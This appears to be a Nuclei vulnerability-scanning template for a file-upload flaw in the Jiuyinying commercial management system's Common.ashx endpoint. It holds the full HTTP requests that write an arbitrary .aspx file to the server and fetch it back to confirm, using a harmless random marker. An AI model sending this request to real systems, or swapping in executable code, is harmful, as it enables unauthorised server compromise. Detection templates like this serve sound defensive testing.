id: jiuyinying-Common-upload

info:
  name: 九垠赢商业管理系统Common.ashx存在文件上传漏洞
  author: jiuyinying
  severity: high
  tags: jiuyinying

http:
  - raw:
      - |
        POST /System/Common.ashx?type=savefile&path=3d6s2kef.aspx HTTP/1.1
        Host: {{Hostname}}
        User-Agent:Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/113.0.0.0 Safari/537.36
        Content-Type: multipart/form-data; boundary=WebKitFormBoundaryHHaZAYecVOf5sfa6

        --WebKitFormBoundaryHHaZAYecVOf5sfa6
        Content-Disposition: form-data; name="content";
        Content-Type: text/plain
        
        {{randstr_1}}
        --WebKitFormBoundaryHHaZAYecVOf5sfa6--

      - |+
        GET /System/3d6s2kef.aspx HTTP/1.1
        Host: {{Hostname}}
        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:96.0) Gecko/20100101 Firefox/96.0
        Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
        Accept-Encoding: gzip, deflate

    matchers:
      - type: status
        status:
          - 200
      - type: word
        part: body_2
        words:
          - '{{randstr_1}}'
    matchers-condition: and
